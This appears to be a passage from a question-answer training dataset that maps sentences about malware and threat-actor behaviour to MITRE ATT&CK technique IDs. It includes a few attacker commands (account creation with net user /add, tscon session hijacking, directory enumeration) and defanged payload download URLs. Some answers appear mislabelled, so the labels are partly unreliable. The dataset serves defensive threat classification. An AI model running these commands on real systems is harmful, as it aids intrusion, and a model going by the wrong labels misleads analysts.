Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can collect network information, including the host IP address, DNS, and proxy information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 collected emails from specific individuals, such as executives and IT staff, using New-MailboxExportRequest followed by Get-MailboxExportRequest.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain .### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can make modifications to Registry keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used PowerShell to execute malicious commands and payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT contains watchdog functionality that periodically ensures HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load is set to point to its executable.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has executed the tasklist command.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search in different online sites depending on what information they seek to gather.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has established persistence through a scheduled task using the command: /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR , named ""WinUpdate"".### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has used personalized spearphishing attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT has the capability to gather the system’s hostname and OS version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot contains screen capture functionality.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has added itself to the Registry Run key as ""NVIDIA"" to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has set auto-forward rules on victim's e-mail accounts.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples of such abuse include modifying GPOs to push a malicious Scheduled Task to computers throughout the domain environment or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used various tools to perform credential dumping.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the Launch Daemon is executed, the program inherits administrative permissions.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specifically, the following GitHub repositories appear to be controlled by the MuddyWater threat actor(s): [unknown SHA256] Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/ArabicBrowserFont.exe [unknown SHA256] Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/FontArabic.exe 9b5e36bb7518a9e333c31d09b589102f89e3425571dd434820ab3c437dc4e0d9 (and several others) Downloads payload from: hxxps://raw.githubusercontent[.]com/ReactDeveloper2017/react/master/src/test/test.js Interestingly, both profiles were populated with forked repositories to give them an air of legitimacy as shown in figure 2### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use startup items automatically executed at boot initialization to establish persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ecipekac has the ability to decrypt fileless loader modules.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Captured hashes are used with PtH to authenticate as that user.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These appeared to be hosted on either Linode or Google Cloud, with a preference for using the ASN AS63949### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used PowerShell commands to execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro can list all services and their configurations.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has been decrypted before execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa’s shellcode attempted to find the process ID of the current process.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For macOS, the sharing -l command lists all shared points used for smb services.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has searched for private keys.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With a sufficient level of access, the net user /add command can be used to create a local account.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck gathers user names from infected hosts.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage.### Assistant: T1619: Cloud Storage Object Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used malware to collect information on network interfaces, including the MAC address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has the capability to destroy files and folders.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin uses various WMI queries to check if the sample is running in a sandbox.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All the strings and settings were encrypted and obfuscated### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has used shell scripts which download mining executables and saves them with the filename ""java"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kivars has the ability to uninstall malware from the infected host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can add a certificate to the Windows store.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used a script to collect information about the infected system.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer .### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used compromised credentials to access other systems on a victim network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHTRACK scrapes memory for properly formatted payment card data.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred can utilize proxy for communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has sent system information and files over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This hidden information can be used for command and control of compromised systems.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access , domain or enterprise administrator to bypass access controls set within the enterprise.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SilverTerrier uses SMTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula also has the capability to invoke a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can enumerate domain accounts via net.exe user /domain.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has hidden malicious executables within PNG files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has been spread via e-mail campaigns utilizing malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of creating a remote Bash shell and executing commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer has used UPX packed binaries.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer stores configuration items in alternate data streams if the Registry is not accessible.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used net user /domain to enumerate domain accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar uses cmd.exe to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use netstat to enumerate current network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used Mimikatz to dump certificates and private keys from the Windows certificate store.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi gathers and exfiltrates keystrokes from the machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some private keys require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has historically leveraged legitimate third-party websites to host the malware’s command and control (C2) information, acting as “dead drops”### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can enable Windows CLI access and execute files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling APT29 to access enterprise cloud applications and services.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cookies are often valid for an extended period of time, even if the web application is not actively used.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet propagates to available network shares.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can collect credentials from WINSCP.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The login shell then configures the user environment with ~/.zprofile and ~/.zlogin.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this campaign the KopiLuwak backdoor was encoded and delivered in a Windows shortcut (.lnk) file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response message that contains the Ticket Granting Ticket to the user.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to discover information about the services enabled throughout the environment.### Assistant: T1526: Cloud Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used AES-256 and 3DES for C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has hidden its GUI using the ShowWindow WINAPI call.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed leveraging a module that scrapes email data from Outlook.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used the Windows command shell to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork used JavaScript code and .SCT files on victim machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe session number to be stolen`, an adversary can hijack a session without the need for credentials or prompts to the user.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target LSASS drivers to obtain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover searches for files on local drives based on a predefined list of file extensions.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Normally an application is run in the current user’s context, regardless of which user or group owns the application.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also deletes Windows Event Logs : Application, Security, Setup, System### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE has the capability to delete files off the victim’s machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can adjust token privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal spearphished victims via Facebook and Whatsapp.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used base64 encoding.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINDSHIELD can gather Registry values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may clear Windows Event Logs to hide the activity of an intrusion.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can modify services by using the OpenService and ChangeServiceConfig functions.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has the capability to stop services and kill processes.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can can remove all system restore points.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy uses netstat -aon to gather network connection information.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability use TCP to send or receive C2 packets.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group uses multiple proxies to obfuscate network traffic from victims.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil has a tool to log keystrokes to %userprofile%\appdata\roaming\apach.{txt,log}.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher can establish persistence via adding a Registry key with a logon script HKEY_CURRENT_USER\Environment ""UserInitMprLogonScript"" .### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command and control information can be encoded using a standard data encoding system.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used a customized PlugX variant which could spread through USB connections.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used net user for account discovery.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck lists all the keyboard layouts installed on the victim’s system using GetKeyboardLayoutList API and checks against a hardcoded language code list.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload or inject malicious web content, such as JavaScript, into websites.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can download additional encrypted backdoors onto the victim via GIF files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia creates a shortcut to maintain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examining passive DNS (pDNS) records from PassiveTotal revealed several domain names associated with this IP that mimic popular technology companies### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This most likely means there is some type of DLL hijacking going on by distributing a legitimate McAfee binary with MirageFox to load up the DLL properly into a legitimate looking process### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperStack can enumerate all account names on a remote share.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can install a service to execute itself as a service.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has sent spearphishing emails containing malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can masquerade as update.exe and svehost.exe; it has also mimicked legitimate Telegram and Chrome files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption .### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT has a command to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These payloads may be used during Initial Access or later to mitigate detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a tool called CLASSFON to covertly proxy network communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has downloaded additional lateral movement scripts from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: dir c:\ >> %temp%\download dir ""c:\Documents and Settings"" >> %temp%\download dir ""c:\Program Files\"" >> %temp%\download dir d:\ >> %temp%\download Dust Storm has used Android backdoors capable of enumerating specific files on the infected devices.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer registers itself under a Registry Run key with the name ""USB Disk Security.""### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious modifications to the PAM system may also be abused to steal credentials.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon creates a base directory that contains the files and folders that are collected.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can use email attachments for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has downloaded additional files and programs from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A complete wipe of all disk sectors may be attempted.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used Rundll32 to execute payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TClient is injected into dllhost.exe Malware Analysis  wab32res.dll (FakeRun loader) loads TClient### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may result in multiple layers of encryption or encryption in protocols that not typically encrypted .### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has lured targets to click on malicious links to gain execution in the target environment.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BUBBLEWRAP can communicate using HTTP or HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest also calls ptrace with the PTRACE_DENY_ATTACH flag to prevent debugging.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can log keystrokes on the victim's machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses a fromCharCode deobfuscation method to avoid explicitly writing execution commands and to hide its code.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can encrypt files on infected machines to extort victims.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The decompressed PowerShell payload has some similarities to the PowerShell Empire agent, such as the use of a jitter value and commands referred to by job ID, but we do not have conclusive evidence that the author of this tool used Empire as a basis for their tool### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used TinyMet to enumerate members of privileged groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use PsExec to execute a payload on a remote host.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can delete files and directories.### 